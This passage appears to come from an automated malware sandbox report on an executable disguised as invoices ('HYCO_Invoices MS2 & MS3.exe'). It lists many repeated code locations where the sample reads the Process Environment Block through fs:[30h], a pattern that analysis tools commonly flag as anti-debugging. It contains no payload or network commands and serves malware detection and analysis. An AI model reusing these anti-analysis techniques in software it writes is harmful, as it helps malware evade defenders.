            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF4260 mov eax, dword ptr fs:[00000030h]2_2_00FF4260
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF6259 mov eax, dword ptr fs:[00000030h]2_2_00FF6259
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEA250 mov eax, dword ptr fs:[00000030h]2_2_00FEA250
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FE823B mov eax, dword ptr fs:[00000030h]2_2_00FE823B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010AC3CD mov eax, dword ptr fs:[00000030h]2_2_010AC3CD
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010763C0 mov eax, dword ptr fs:[00000030h]2_2_010763C0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010943D4 mov eax, dword ptr fs:[00000030h]2_2_010943D4
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010943D4 mov eax, dword ptr fs:[00000030h]2_2_010943D4
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010003E9 mov eax, dword ptr fs:[00000030h]2_2_010003E9
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010003E9 mov eax, dword ptr fs:[00000030h]2_2_010003E9
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010003E9 mov eax, dword ptr fs:[00000030h]2_2_010003E9
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010003E9 mov eax, dword ptr fs:[00000030h]2_2_010003E9
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010003E9 mov eax, dword ptr fs:[00000030h]2_2_010003E9
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010003E9 mov eax, dword ptr fs:[00000030h]2_2_010003E9
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010003E9 mov eax, dword ptr fs:[00000030h]2_2_010003E9
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010003E9 mov eax, dword ptr fs:[00000030h]2_2_010003E9
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100E3F0 mov eax, dword ptr fs:[00000030h]2_2_0100E3F0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100E3F0 mov eax, dword ptr fs:[00000030h]2_2_0100E3F0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100E3F0 mov eax, dword ptr fs:[00000030h]2_2_0100E3F0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010263FF mov eax, dword ptr fs:[00000030h]2_2_010263FF
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF83C0 mov eax, dword ptr fs:[00000030h]2_2_00FF83C0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF83C0 mov eax, dword ptr fs:[00000030h]2_2_00FF83C0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF83C0 mov eax, dword ptr fs:[00000030h]2_2_00FF83C0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF83C0 mov eax, dword ptr fs:[00000030h]2_2_00FF83C0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFA3C0 mov eax, dword ptr fs:[00000030h]2_2_00FFA3C0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFA3C0 mov eax, dword ptr fs:[00000030h]2_2_00FFA3C0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFA3C0 mov eax, dword ptr fs:[00000030h]2_2_00FFA3C0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFA3C0 mov eax, dword ptr fs:[00000030h]2_2_00FFA3C0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFA3C0 mov eax, dword ptr fs:[00000030h]2_2_00FFA3C0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFA3C0 mov eax, dword ptr fs:[00000030h]2_2_00FFA3C0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01078243 mov eax, dword ptr fs:[00000030h]2_2_01078243
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01078243 mov ecx, dword ptr fs:[00000030h]2_2_01078243
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FE8397 mov eax, dword ptr fs:[00000030h]2_2_00FE8397
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FE8397 mov eax, dword ptr fs:[00000030h]2_2_00FE8397
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FE8397 mov eax, dword ptr fs:[00000030h]2_2_00FE8397
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEE388 mov eax, dword ptr fs:[00000030h]2_2_00FEE388
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEE388 mov eax, dword ptr fs:[00000030h]2_2_00FEE388
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEE388 mov eax, dword ptr fs:[00000030h]2_2_00FEE388
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A0274 mov eax, dword ptr fs:[00000030h]2_2_010A0274
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A0274 mov eax, dword ptr fs:[00000030h]2_2_010A0274
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A0274 mov eax, dword ptr fs:[00000030h]2_2_010A0274
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A0274 mov eax, dword ptr fs:[00000030h]2_2_010A0274
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A0274 mov eax, dword ptr fs:[00000030h]2_2_010A0274
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A0274 mov eax, dword ptr fs:[00000030h]2_2_010A0274
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A0274 mov eax, dword ptr fs:[00000030h]2_2_010A0274
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A0274 mov eax, dword ptr fs:[00000030h]2_2_010A0274
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A0274 mov eax, dword ptr fs:[00000030h]2_2_010A0274
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A0274 mov eax, dword ptr fs:[00000030h]2_2_010A0274
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A0274 mov eax, dword ptr fs:[00000030h]2_2_010A0274
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010A0274 mov eax, dword ptr fs:[00000030h]2_2_010A0274
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01070283 mov eax, dword ptr fs:[00000030h]2_2_01070283
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01070283 mov eax, dword ptr fs:[00000030h]2_2_01070283
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01070283 mov eax, dword ptr fs:[00000030h]2_2_01070283
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E284 mov eax, dword ptr fs:[00000030h]2_2_0102E284
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E284 mov eax, dword ptr fs:[00000030h]2_2_0102E284
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010002A0 mov eax, dword ptr fs:[00000030h]2_2_010002A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010002A0 mov eax, dword ptr fs:[00000030h]2_2_010002A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010862A0 mov eax, dword ptr fs:[00000030h]2_2_010862A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010862A0 mov ecx, dword ptr fs:[00000030h]2_2_010862A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010862A0 mov eax, dword ptr fs:[00000030h]2_2_010862A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010862A0 mov eax, dword ptr fs:[00000030h]2_2_010862A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010862A0 mov eax, dword ptr fs:[00000030h]2_2_010862A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010862A0 mov eax, dword ptr fs:[00000030h]2_2_010862A0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010002E1 mov eax, dword ptr fs:[00000030h]2_2_010002E1
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010002E1 mov eax, dword ptr fs:[00000030h]2_2_010002E1
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010002E1 mov eax, dword ptr fs:[00000030h]2_2_010002E1
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEC310 mov ecx, dword ptr fs:[00000030h]2_2_00FEC310
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01086500 mov eax, dword ptr fs:[00000030h]2_2_01086500
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010C4500 mov eax, dword ptr fs:[00000030h]2_2_010C4500
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010C4500 mov eax, dword ptr fs:[00000030h]2_2_010C4500
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010C4500 mov eax, dword ptr fs:[00000030h]2_2_010C4500
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010C4500 mov eax, dword ptr fs:[00000030h]2_2_010C4500
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010C4500 mov eax, dword ptr fs:[00000030h]2_2_010C4500
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010C4500 mov eax, dword ptr fs:[00000030h]2_2_010C4500
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010C4500 mov eax, dword ptr fs:[00000030h]2_2_010C4500
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF04E5 mov ecx, dword ptr fs:[00000030h]2_2_00FF04E5
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000535 mov eax, dword ptr fs:[00000030h]2_2_01000535
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000535 mov eax, dword ptr fs:[00000030h]2_2_01000535
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000535 mov eax, dword ptr fs:[00000030h]2_2_01000535
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000535 mov eax, dword ptr fs:[00000030h]2_2_01000535
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000535 mov eax, dword ptr fs:[00000030h]2_2_01000535
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000535 mov eax, dword ptr fs:[00000030h]2_2_01000535
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E53E mov eax, dword ptr fs:[00000030h]2_2_0101E53E
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E53E mov eax, dword ptr fs:[00000030h]2_2_0101E53E
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E53E mov eax, dword ptr fs:[00000030h]2_2_0101E53E
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E53E mov eax, dword ptr fs:[00000030h]2_2_0101E53E
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E53E mov eax, dword ptr fs:[00000030h]2_2_0101E53E
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF64AB mov eax, dword ptr fs:[00000030h]2_2_00FF64AB
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102656A mov eax, dword ptr fs:[00000030h]2_2_0102656A
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102656A mov eax, dword ptr fs:[00000030h]2_2_0102656A
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102656A mov eax, dword ptr fs:[00000030h]2_2_0102656A
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01024588 mov eax, dword ptr fs:[00000030h]2_2_01024588
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E59C mov eax, dword ptr fs:[00000030h]2_2_0102E59C
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010705A7 mov eax, dword ptr fs:[00000030h]2_2_010705A7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010705A7 mov eax, dword ptr fs:[00000030h]2_2_010705A7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010705A7 mov eax, dword ptr fs:[00000030h]2_2_010705A7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FE645D mov eax, dword ptr fs:[00000030h]2_2_00FE645D
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010145B1 mov eax, dword ptr fs:[00000030h]2_2_010145B1
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010145B1 mov eax, dword ptr fs:[00000030h]2_2_010145B1
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E5CF mov eax, dword ptr fs:[00000030h]2_2_0102E5CF
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E5CF mov eax, dword ptr fs:[00000030h]2_2_0102E5CF
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102A5D0 mov eax, dword ptr fs:[00000030h]2_2_0102A5D0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102A5D0 mov eax, dword ptr fs:[00000030h]2_2_0102A5D0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEC427 mov eax, dword ptr fs:[00000030h]2_2_00FEC427
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEE420 mov eax, dword ptr fs:[00000030h]2_2_00FEE420
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEE420 mov eax, dword ptr fs:[00000030h]2_2_00FEE420
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEE420 mov eax, dword ptr fs:[00000030h]2_2_00FEE420
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E5E7 mov eax, dword ptr fs:[00000030h]2_2_0101E5E7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E5E7 mov eax, dword ptr fs:[00000030h]2_2_0101E5E7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E5E7 mov eax, dword ptr fs:[00000030h]2_2_0101E5E7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E5E7 mov eax, dword ptr fs:[00000030h]2_2_0101E5E7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E5E7 mov eax, dword ptr fs:[00000030h]2_2_0101E5E7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E5E7 mov eax, dword ptr fs:[00000030h]2_2_0101E5E7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E5E7 mov eax, dword ptr fs:[00000030h]2_2_0101E5E7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101E5E7 mov eax, dword ptr fs:[00000030h]2_2_0101E5E7
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102C5ED mov eax, dword ptr fs:[00000030h]2_2_0102C5ED
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102C5ED mov eax, dword ptr fs:[00000030h]2_2_0102C5ED
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01028402 mov eax, dword ptr fs:[00000030h]2_2_01028402
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01028402 mov eax, dword ptr fs:[00000030h]2_2_01028402
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01028402 mov eax, dword ptr fs:[00000030h]2_2_01028402
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF25E0 mov eax, dword ptr fs:[00000030h]2_2_00FF25E0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01076420 mov eax, dword ptr fs:[00000030h]2_2_01076420
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01076420 mov eax, dword ptr fs:[00000030h]2_2_01076420
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01076420 mov eax, dword ptr fs:[00000030h]2_2_01076420
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01076420 mov eax, dword ptr fs:[00000030h]2_2_01076420
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01076420 mov eax, dword ptr fs:[00000030h]2_2_01076420
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01076420 mov eax, dword ptr fs:[00000030h]2_2_01076420
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01076420 mov eax, dword ptr fs:[00000030h]2_2_01076420
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF65D0 mov eax, dword ptr fs:[00000030h]2_2_00FF65D0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E443 mov eax, dword ptr fs:[00000030h]2_2_0102E443
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E443 mov eax, dword ptr fs:[00000030h]2_2_0102E443
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E443 mov eax, dword ptr fs:[00000030h]2_2_0102E443
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E443 mov eax, dword ptr fs:[00000030h]2_2_0102E443
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E443 mov eax, dword ptr fs:[00000030h]2_2_0102E443
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E443 mov eax, dword ptr fs:[00000030h]2_2_0102E443
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E443 mov eax, dword ptr fs:[00000030h]2_2_0102E443
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102E443 mov eax, dword ptr fs:[00000030h]2_2_0102E443
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101245A mov eax, dword ptr fs:[00000030h]2_2_0101245A
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107C460 mov ecx, dword ptr fs:[00000030h]2_2_0107C460
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101A470 mov eax, dword ptr fs:[00000030h]2_2_0101A470
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101A470 mov eax, dword ptr fs:[00000030h]2_2_0101A470
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101A470 mov eax, dword ptr fs:[00000030h]2_2_0101A470
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF2582 mov eax, dword ptr fs:[00000030h]2_2_00FF2582
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF2582 mov ecx, dword ptr fs:[00000030h]2_2_00FF2582
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF8550 mov eax, dword ptr fs:[00000030h]2_2_00FF8550
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF8550 mov eax, dword ptr fs:[00000030h]2_2_00FF8550
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010244B0 mov ecx, dword ptr fs:[00000030h]2_2_010244B0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107A4B0 mov eax, dword ptr fs:[00000030h]2_2_0107A4B0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102C700 mov eax, dword ptr fs:[00000030h]2_2_0102C700
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01020710 mov eax, dword ptr fs:[00000030h]2_2_01020710
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102C720 mov eax, dword ptr fs:[00000030h]2_2_0102C720
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102C720 mov eax, dword ptr fs:[00000030h]2_2_0102C720
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106C730 mov eax, dword ptr fs:[00000030h]2_2_0106C730
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102273C mov eax, dword ptr fs:[00000030h]2_2_0102273C
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102273C mov ecx, dword ptr fs:[00000030h]2_2_0102273C
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102273C mov eax, dword ptr fs:[00000030h]2_2_0102273C
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102674D mov esi, dword ptr fs:[00000030h]2_2_0102674D
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102674D mov eax, dword ptr fs:[00000030h]2_2_0102674D
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102674D mov eax, dword ptr fs:[00000030h]2_2_0102674D
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01074755 mov eax, dword ptr fs:[00000030h]2_2_01074755
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032750 mov eax, dword ptr fs:[00000030h]2_2_01032750
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01032750 mov eax, dword ptr fs:[00000030h]2_2_01032750
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107E75D mov eax, dword ptr fs:[00000030h]2_2_0107E75D
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF4690 mov eax, dword ptr fs:[00000030h]2_2_00FF4690
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF4690 mov eax, dword ptr fs:[00000030h]2_2_00FF4690
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000770 mov eax, dword ptr fs:[00000030h]2_2_01000770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000770 mov eax, dword ptr fs:[00000030h]2_2_01000770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000770 mov eax, dword ptr fs:[00000030h]2_2_01000770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000770 mov eax, dword ptr fs:[00000030h]2_2_01000770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000770 mov eax, dword ptr fs:[00000030h]2_2_01000770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000770 mov eax, dword ptr fs:[00000030h]2_2_01000770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000770 mov eax, dword ptr fs:[00000030h]2_2_01000770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000770 mov eax, dword ptr fs:[00000030h]2_2_01000770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000770 mov eax, dword ptr fs:[00000030h]2_2_01000770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000770 mov eax, dword ptr fs:[00000030h]2_2_01000770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000770 mov eax, dword ptr fs:[00000030h]2_2_01000770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01000770 mov eax, dword ptr fs:[00000030h]2_2_01000770
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0109678E mov eax, dword ptr fs:[00000030h]2_2_0109678E
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010707C3 mov eax, dword ptr fs:[00000030h]2_2_010707C3
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF262C mov eax, dword ptr fs:[00000030h]2_2_00FF262C
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107E7E1 mov eax, dword ptr fs:[00000030h]2_2_0107E7E1
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010127ED mov eax, dword ptr fs:[00000030h]2_2_010127ED
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010127ED mov eax, dword ptr fs:[00000030h]2_2_010127ED
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010127ED mov eax, dword ptr fs:[00000030h]2_2_010127ED
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF47FB mov eax, dword ptr fs:[00000030h]2_2_00FF47FB
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF47FB mov eax, dword ptr fs:[00000030h]2_2_00FF47FB
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100260B mov eax, dword ptr fs:[00000030h]2_2_0100260B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100260B mov eax, dword ptr fs:[00000030h]2_2_0100260B
